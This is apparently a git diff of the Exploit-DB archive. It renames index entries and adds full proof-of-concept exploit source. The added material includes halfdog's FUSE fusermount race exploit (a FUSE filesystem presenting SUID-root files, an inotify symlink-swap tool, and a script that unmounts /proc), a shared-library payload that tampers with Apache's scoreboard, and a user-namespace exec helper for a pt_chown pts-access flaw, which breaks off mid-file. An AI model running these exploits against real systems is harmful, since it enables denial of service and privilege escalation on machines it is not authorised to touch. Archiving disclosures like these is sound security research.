31944,platforms/php/webapps/31944.txt,"phpAuction - 'profile.php' SQL Injection (2)",2008-06-21,Mr.SQL,php,webapps,0
31945,platforms/php/webapps/31945.txt,"PEGames - Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0
31947,platforms/php/webapps/31947.txt,"Joomla! Component EXP Shop 1.0 - SQL Injection",2008-06-22,His0k4,php,webapps,0
@ -32689,7 +32687,7 @@ id,file,description,date,author,platform,type,port
32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Parameter Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0
32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,php,webapps,0
32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0
32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (2)",2008-11-08,G4N0K,php,webapps,0
32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0
32577,platforms/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps,0
32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0
@ -33142,7 +33140,6 @@ id,file,description,date,author,platform,type,port
33441,platforms/php/webapps/33441.txt,"Joomla! Component Joomulus 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0
33444,platforms/php/webapps/33444.txt,"DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion",2009-12-28,Securitylab.ir,php,webapps,0
33445,platforms/php/webapps/33445.txt,"PHPInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0
33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0
@ -33655,7 +33652,7 @@ id,file,description,date,author,platform,type,port
34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0
34374,platforms/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0
34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0
34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2010-10-04,Abysssec,php,webapps,0
34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2)",2010-10-04,Abysssec,php,webapps,0
34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI - Cross-Site Scripting",2009-12-04,anonymous,php,webapps,0
34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0
34380,platforms/asp/webapps/34380.txt,"Active Business Directory 2 - 'searchadvance.asp' Cross-Site Scripting",2009-12-22,"Andrea Bocchetti",asp,webapps,0
@ -35385,7 +35382,7 @@ id,file,description,date,author,platform,type,port
37067,platforms/php/webapps/37067.txt,"WordPress Plugin FeedWordPress 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
37070,platforms/php/webapps/37070.txt,"WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,php,webapps,0
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 - Multiple SQL Injections (2)",2012-04-10,"Chokri B.A",php,webapps,0
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections",2012-04-10,"Chokri B.A",php,webapps,0
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
37074,platforms/php/webapps/37074.txt,"WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80
@ -37162,7 +37159,7 @@ id,file,description,date,author,platform,type,port
40932,platforms/php/webapps/40932.txt,"WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80
40934,platforms/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,php,webapps,80
40939,platforms/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)",2016-12-16,"Lenon Leite",php,webapps,0
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
@ -37196,7 +37193,7 @@ id,file,description,date,author,platform,type,port
41010,platforms/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
41011,platforms/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps,0
41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (1)",2017-01-10,Vulnerability-Lab,hardware,webapps,0
41023,platforms/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
41024,platforms/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
41028,platforms/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
@ -37235,7 +37232,7 @@ id,file,description,date,author,platform,type,port
41068,platforms/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",php,webapps,0
41070,platforms/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
41071,platforms/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
41074,platforms/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-12,Vulnerability-Lab,hardware,webapps,0
41074,platforms/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (2)",2017-01-12,Vulnerability-Lab,hardware,webapps,0
41075,platforms/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",php,webapps,0
41077,platforms/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
41078,platforms/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
@ -37281,7 +37278,7 @@ id,file,description,date,author,platform,type,port
41124,platforms/php/webapps/41124.txt,"Job Vacancy Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41125,platforms/php/webapps/41125.txt,"Home of Viral Images_ Videos and Articles Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41126,platforms/php/webapps/41126.txt,"Video Site Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41127,platforms/php/webapps/41127.txt,"Classifieds Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41127,platforms/php/webapps/41127.txt,"Classifieds Script - 'term' SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41131,platforms/php/webapps/41131.txt,"Complain Management System - SQL injection",2017-01-20,"Sibusiso Sishi",php,webapps,0
41132,platforms/php/webapps/41132.txt,"ICGames-Games Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
41133,platforms/php/webapps/41133.txt,"Domains Marketplace Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
@ -37310,7 +37307,7 @@ id,file,description,date,author,platform,type,port
41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41179,platforms/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",cgi,webapps,0
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (2)",2017-01-27,"Lenon Leite",php,webapps,0
41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0

Can't render this file because it is too large.

437
platforms/linux/dos/34953.txt
View file

@ -5,4 +5,439 @@ FUSE fusermount tool is prone to a race-condition vulnerability.
A local attacker can exploit this issue to cause a denial of service by unmounting any filesystem of the system.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34953.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34953.zip
--- FuseMinimal.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* Minimal userspace file system demo, compile using
* gcc -D_FILE_OFFSET_BITS=64 -Wall FuseMinimal.c -o FuseMinimal -lfuse
*
* See also /usr/include/fuse/fuse.h
*/
#define FUSE_USE_VERSION 28
#include <errno.h>
#include <fuse.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static FILE *logFile;
static char *fileNameNormal="/file";
static char *fileNameCharDev="/chardev";
static char *fileNameNormalSubFile="/dir/file";
static char *realFileName="./RealFile";
static int realFileHandle=-1;
static int io_getattr(const char *path, struct stat *stbuf) {
fprintf(logFile, "io_getattr(path=\"%s\", stbuf=0x%p)\n",
path, stbuf);
fflush(logFile);
int res=-ENOENT;
memset(stbuf, 0, sizeof(struct stat));
if(strcmp(path, "/") == 0) {
stbuf->st_mode=S_IFDIR|0755;
stbuf->st_nlink=2;
res=0;
} else if(strcmp(path, fileNameCharDev)==0) {
// stbuf->st_dev=makedev(5, 2);
stbuf->st_mode=S_IFCHR|0777;
stbuf->st_rdev=makedev(5, 2);
stbuf->st_nlink=1; // Number of hard links
stbuf->st_size=100;
res=0;
} else if(strcmp(path, "/dir")==0) {
stbuf->st_mode=S_IFDIR|S_ISGID|0777;
stbuf->st_nlink=1; // Number of hard links
stbuf->st_size=1<<12;
res=0;
} else if((!strcmp(path, fileNameNormal))||(!strcmp(path, fileNameNormalSubFile))) {
stbuf->st_mode=S_ISUID|S_IFREG|0777;
stbuf->st_size=100;
if(realFileName) {
if(fstat(realFileHandle, stbuf)) {
fprintf(logFile, "Stat of %s failed, error %d (%s)\n",
realFileName, errno, strerror(errno));
} else {
// Just change uid/suid, which is far more interesting during testing
stbuf->st_mode|=S_ISUID;
stbuf->st_uid=0;
stbuf->st_gid=0;
}
} else {
stbuf->st_mode=S_ISUID|S_IFREG|0777;
stbuf->st_size=100;
}
stbuf->st_nlink=1; // Number of hard links
res=0;
}
return(res);
}
static int io_readlink(const char *path, char *buffer, size_t length) {
fprintf(logFile, "io_readlink(path=\"%s\", buffer=0x%p, length=0x%lx)\n",
path, buffer, (long)length);
fflush(logFile);
return(-1);
}
static int io_unlink(const char *path) {
fprintf(logFile, "io_unlink(path=\"%s\")\n", path);
fflush(logFile);
return(0);
}
static int io_rename(const char *oldPath, const char *newPath) {
fprintf(logFile, "io_rename(oldPath=\"%s\", newPath=\"%s\")\n",
oldPath, newPath);
fflush(logFile);
return(0);
}
static int io_chmod(const char *path, mode_t mode) {
fprintf(logFile, "io_chmod(path=\"%s\", mode=0x%x)\n", path, mode);
fflush(logFile);
return(0);
}
static int io_chown(const char *path, uid_t uid, gid_t gid) {
fprintf(logFile, "io_chown(path=\"%s\", uid=%d, gid=%d)\n", path, uid, gid);
fflush(logFile);
return(0);
}
/** Open a file. This function checks access permissions and may
* associate a file info structure for future access.
* @returns 0 when open OK
*/
static int io_open(const char *path, struct fuse_file_info *fi) {
fprintf(logFile, "io_open(path=\"%s\", fi=0x%p)\n", path, fi);
fflush(logFile);
return(0);
}
static int io_read(const char *path, char *buffer, size_t length,
off_t offset, struct fuse_file_info *fi) {
fprintf(logFile, "io_read(path=\"%s\", buffer=0x%p, length=0x%lx, offset=0x%lx, fi=0x%p)\n",
path, buffer, (long)length, (long)offset, fi);
fflush(logFile);
if(length<0) return(-1);
if((!strcmp(path, fileNameNormal))||(!strcmp(path, fileNameNormalSubFile))) {
if(!realFileName) {
if((offset<0)||(offset>4)) return(-1);
if(offset+length>4) length=4-offset;
if(length>0) memcpy(buffer, "xxxx", length);
return(length);
}
if(lseek(realFileHandle, offset, SEEK_SET)==(off_t)-1) {
fprintf(stderr, "read: seek on %s failed\n", path);
return(-1);
}
return(read(realFileHandle, buffer, length));
}
return(-1);
}
static int io_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi) {
fprintf(logFile, "io_readdir(path=\"%s\", buf=0x%p, filler=0x%p, offset=0x%lx, fi=0x%p)\n",
path, buf, filler, ((long)offset), fi);
fflush(logFile);
(void) offset;
(void) fi;
if(!strcmp(path, "/")) {
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, fileNameCharDev+1, NULL, 0);
filler(buf, "dir", NULL, 0);
filler(buf, fileNameNormal+1, NULL, 0);
return(0);
} else if(!strcmp(path, "/dir")) {
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, "file", NULL, 0);
return(0);
}
return -ENOENT;
}
static int io_access(const char *path, int mode) {
fprintf(logFile, "io_access(path=\"%s\", mode=0x%x)\n",
path, mode);
fflush(logFile);
return(0);
}
static int io_ioctl(const char *path, int cmd, void *arg,
struct fuse_file_info *fi, unsigned int flags, void *data) {
fprintf(logFile, "io_ioctl(path=\"%s\", cmd=0x%x, arg=0x%p, fi=0x%p, flags=0x%x, data=0x%p)\n",
path, cmd, arg, fi, flags, data);
fflush(logFile);
return(0);
}
static struct fuse_operations hello_oper = {
.getattr = io_getattr,
.readlink = io_readlink,
// .getdir = deprecated
// .mknod
// .mkdir
.unlink = io_unlink,
// .rmdir
// .symlink
.rename = io_rename,
// .link
.chmod = io_chmod,
.chown = io_chown,
// .truncate
// .utime
.open = io_open,
.read = io_read,
// .write
// .statfs
// .flush
// .release
// .fsync
// .setxattr
// .getxattr
// .listxattr
// .removexattr
// .opendir
.readdir = io_readdir,
// .releasedir
// .fsyncdir
// .init
// .destroy
.access = io_access,
// .create
// .ftruncate
// .fgetattr
// .lock
// .utimens
// .bmap
.ioctl = io_ioctl,
// .poll
};
int main(int argc, char *argv[]) {
char buffer[128];
realFileHandle=open(realFileName, O_RDWR);
if(realFileHandle<0) {
fprintf(stderr, "Failed to open %s\n", realFileName);
exit(1);
}
snprintf(buffer, sizeof(buffer), "FuseMinimal-%d.log", getpid());
logFile=fopen(buffer, "a");
if(!logFile) {
fprintf(stderr, "Failed to open log: %s\n", (char*)strerror(errno));
return(1);
}
fprintf(logFile, "Starting fuse init\n");
fflush(logFile);
return fuse_main(argc, argv, &hello_oper, NULL);
}
--- EOF ---
--- DirModifyInotify.c ---
/** This program waits for notify of file/directory to replace
* given directory with symlink.
*
* Usage: DirModifyInotify --Watch [watchfile0] --WatchCount [num]
* --MovePath [path] --MoveTarget [path] --LinkTarget [path] --Verbose
*
* Parameters:
* * --MoveTarget: If set, move path to that target location before
* attempting to symlink.
* * --LinkTarget: If set, the MovePath is replaced with link to
* this path
*
* Compile:
* gcc -o DirModifyInotify DirModifyInotify.c
*
* Copyright (c) 2010-2016 halfdog <me (%) halfdog.net>
*
* This software is provided by the copyright owner "as is" to
* study it but without any expressed or implied warranties, that
* this software is fit for any other purpose. If you try to compile
* or run it, you do it solely on your own risk and the copyright
* owner shall not be liable for any direct or indirect damage
* caused by this software.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <unistd.h>
int main(int argc, char **argv) {
char *movePath=NULL;
char *newDirName=NULL;
char *symlinkTarget=NULL;
int argPos;
int handle;
int inotifyHandle;
int inotifyDataSize=sizeof(struct inotify_event)*16;
struct inotify_event *inotifyData;
int randomVal;
int callCount;
int targetCallCount=0;
int verboseFlag=0;
int result;
if(argc<4) return(1);
inotifyHandle=inotify_init();
for(argPos=1; argPos<argc; argPos++) {
if(!strcmp(argv[argPos], "--Verbose")) {
verboseFlag=1;
continue;
}
if(!strcmp(argv[argPos], "--LinkTarget")) {
argPos++;
if(argPos==argc) return(1);
symlinkTarget=argv[argPos];
continue;
}
if(!strcmp(argv[argPos], "--MovePath")) {
argPos++;
if(argPos==argc) return(1);
movePath=argv[argPos];
continue;
}
if(!strcmp(argv[argPos], "--MoveTarget")) {
argPos++;
if(argPos==argc) return(1);
newDirName=argv[argPos];
continue;
}
if(!strcmp(argv[argPos], "--Watch")) {
argPos++;
if(argPos==argc) return(1);
//IN_ALL_EVENTS, IN_CLOSE_WRITE|IN_CLOSE_NOWRITE, IN_OPEN|IN_ACCESS
result=inotify_add_watch(inotifyHandle, argv[argPos], IN_ALL_EVENTS);
if(result==-1) {
fprintf(stderr, "Failed to add watch path %s, error %d\n",
argv[argPos], errno);
return(1);
}
continue;
}
if(!strcmp(argv[argPos], "--WatchCount")) {
argPos++;
if(argPos==argc) return(1);
targetCallCount=atoi(argv[argPos]);
continue;
}
fprintf(stderr, "Unknown option %s\n", argv[argPos]);
return(1);
}
if(!movePath) {
fprintf(stderr, "No move path specified!\n" \
"Usage: DirModifyInotify.c --Watch [watchfile0] --MovePath [path]\n" \
" --LinkTarget [path]\n");
return(1);
}
fprintf(stderr, "Using target call count %d\n", targetCallCount);
// Init name of new directory if not already defined.
if(!newDirName) {
newDirName=(char*)malloc(strlen(movePath)+256);
sprintf(newDirName, "%s-moved", movePath);
}
inotifyData=(struct inotify_event*)malloc(inotifyDataSize);
for(callCount=0; ; callCount++) {
result=read(inotifyHandle, inotifyData, inotifyDataSize);
if(callCount==targetCallCount) {
rename(movePath, newDirName);
// rmdir(movePath);
if(symlinkTarget) symlink(symlinkTarget, movePath);
fprintf(stderr, "Move triggered at count %d\n", callCount);
break;
}
if(verboseFlag) {
fprintf(stderr, "Received notify %d, result %d, error %s\n",
callCount, result, (result<0?strerror(errno):NULL));
}
if(result<0) {
break;
}
}
return(0);
}
--- EOF ---
--- Test.sh ---
#!/bin/bash
#
# Copyright (c) halfdog <me (%) halfdog.net>
#
# This software is provided by the copyright owner "as is" to
# study it but without any expressed or implied warranties, that
# this software is fit for any other purpose. If you try to compile
# or run it, you do it solely on your own risk and the copyright
# owner shall not be liable for any direct or indirect damage
# caused by this software.
mkdir -p tmp/proc
(cd tmp/proc; sleep 1; ../../FuseMinimal .) &
(./DirModifyInotify --Watch tmp/proc --Watch /etc/mtab --WatchCount 8 --MovePath tmp --LinkTarget /) &
sleep 3
fusermount -u -z /proc/
# Check that proc was unmounted by running ps
ps aux
--- EOF ---

54
platforms/linux/dos/41768.txt
View file

@ -62,4 +62,56 @@ set *(int*)($esp+8)=1
set $eip=*__libc_dlopen_mode
continue
Without gdb, the mod_setenv exploit demo (2nd attempt) (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html) could be used to load the code.
Without gdb, the mod_setenv exploit demo (2nd attempt) (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html) could be used to load the code.
--- LibScoreboardTest.c ---
/** gcc -Wall -c LibScoreboardTest.c
* ld -shared -Bdynamic LibScoreboardTest.o -L/lib -lc -o LibScoreboardTest.so
*/
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
extern void _init() {
int fd=-1, pos;
char mmapData[1<<16];
int mmapDataLen;
char str[1024];
char* sharedSegStart=NULL;
char* sharedSegEnd=NULL;
int sharedSegLen;
int result;
fd=open("/proc/self/maps", O_RDONLY);
mmapDataLen=0;
while((result=read(fd, mmapData+mmapDataLen, sizeof(mmapData)-mmapDataLen))>0) mmapDataLen+=result;
close(fd);
fd=open("/tmp/testlog", O_RDWR|O_CREAT, 0777);
result=sprintf(str, "Read %d\n", mmapDataLen);
write(fd, str, result);
write(fd, mmapData, mmapDataLen);
for(pos=0; pos<mmapDataLen;) {
result=sscanf(mmapData+pos, "%8x-%8x rw-s %8x ",
(int*)&sharedSegStart, (int*)&sharedSegEnd, &result);
if(result==3) break;
while((pos<mmapDataLen)&&(mmapData[pos]!='\n')) pos++;
if(pos==mmapDataLen) break;
pos++;
}
result=sprintf(str, "Shared seg data 0x%x-0x%x\n", (int)sharedSegStart,
(int)sharedSegEnd);
write(fd, str, result);
if(pos==mmapDataLen) return;
// Set ap_scoreboard_e sb_type=3
*(int*)(sharedSegStart+0x10)=3;
exit(0);
}
--- EOF --

8
platforms/linux/local/40943.txt
View file

@ -1,3 +1,5 @@
Source: https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html
## Overview
Full reliable 0day drive-by exploit against Fedora 25 + Google Chrome, by breaking out of Super Nintendo Entertainment System emulation via cascading side effects from a subtle and interesting emulation error.
@ -31,8 +33,4 @@ Exploit file: xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc (rename it to .mp3 to ge
Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install -- which I certainly always do. On Fedora, theres a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file.
As always, the general lack of sandboxing here contributes to the severity. I think we inhabit a world where media parsing sandboxes should be mandatory these days. Theres hope: some of my other recent disclosures appear to have motivated a sandbox for Gnomes tracker (https://bugzilla.gnome.org/show_bug.cgi?id=764786).
Source: https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html
As always, the general lack of sandboxing here contributes to the severity. I think we inhabit a world where media parsing sandboxes should be mandatory these days. Theres hope: some of my other recent disclosures appear to have motivated a sandbox for Gnomes tracker (https://bugzilla.gnome.org/show_bug.cgi?id=764786).

174
platforms/linux/local/41760.txt
View file

@ -3,6 +3,7 @@ Source: http://www.halfdog.net/Security/2015/PtChownArbitraryPtsAccessViaUserNam
## Introduction
Problem description: With Ubuntu Wily and earlier, /usr/lib/pt_chown was used to change ownership of slave pts devices in /dev/pts to the same uid holding the master file descriptor for the slave. This is done using the pt_chown SUID binary, which invokes the ptsname function on the master-fd, thus again performing a TIOCGPTN ioctl to get the slave pts number. Using the result from the ioctl, the pathname of the slave pts is constructed and chown invoked on it, see login/programs/pt_chown.c:
pty = ptsname (PTY_FILENO);
if (pty == NULL)
...
@ -62,4 +63,175 @@ test# /usr/lib/pt_chown
test# ls -al /dev/pts/0
crw--w---- 1 test tty 136, 1 Dec 27 12:50 /dev/pts/0
On systems where the TIOCSTI-ioctl is not prohibited, the tools from TtyPushbackPrivilegeEscalation (http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/) to directly inject code into a shell using the pts device. This is not the case at least on Ubuntu Wily. But as reading and writing to the pts is allowed, the malicious user can not intercept all keystrokes and display faked output from commands never really executed. Thus he could lure the user into a) change his password or attempt to invoke su/sudo or b) simulate a situation, where user's next step is predictable and risky and then stop reading the pts, thus making user to execute a command in completely unexpected way.
On systems where the TIOCSTI-ioctl is not prohibited, the tools from TtyPushbackPrivilegeEscalation (http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/) to directly inject code into a shell using the pts device. This is not the case at least on Ubuntu Wily. But as reading and writing to the pts is allowed, the malicious user can not intercept all keystrokes and display faked output from commands never really executed. Thus he could lure the user into a) change his password or attempt to invoke su/sudo or b) simulate a situation, where user's next step is predictable and risky and then stop reading the pts, thus making user to execute a command in completely unexpected way.
--- UserNamespaceExec.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015-2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool creates a new namespace, initialize the uid/gid
* map and execute the program given as argument. This is similar
* to unshare(1) from newer util-linux packages.
*
* gcc -o UserNamespaceExec UserNamespaceExec.c
*
* Usage: UserNamespaceExec [options] -- [program] [args]
*
* * --NoSetGroups: do not disable group chanages
* * --NoSetGidMap:
* * --NoSetUidMap:
*/
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
extern char **environ;
static int childFunc(void *arg) {
int parentPid=getppid();
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
while((geteuid()!=0)&&(parentPid==getppid())) {
sleep(1);
}
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
int result=execve(((char**)arg)[0], (char**)arg, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
int main(int argc, char *argv[]) {
int argPos;
int noSetGroupsFlag=0;
int setGidMapFlag=1;
int setUidMapFlag=1;
int result;
for(argPos=1; argPos<argc; argPos++) {
char *argName=argv[argPos];
if(!strcmp(argName, "--")) {
argPos++;
break;
}
if(strncmp(argName, "--", 2)) {
break;
}
if(!strcmp(argName, "--NoSetGidMap")) {
setGidMapFlag=0;
continue;
}
if(!strcmp(argName, "--NoSetGroups")) {
noSetGroupsFlag=1;
continue;
}
if(!strcmp(argName, "--NoSetUidMap")) {
setUidMapFlag=0;
continue;
}
fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
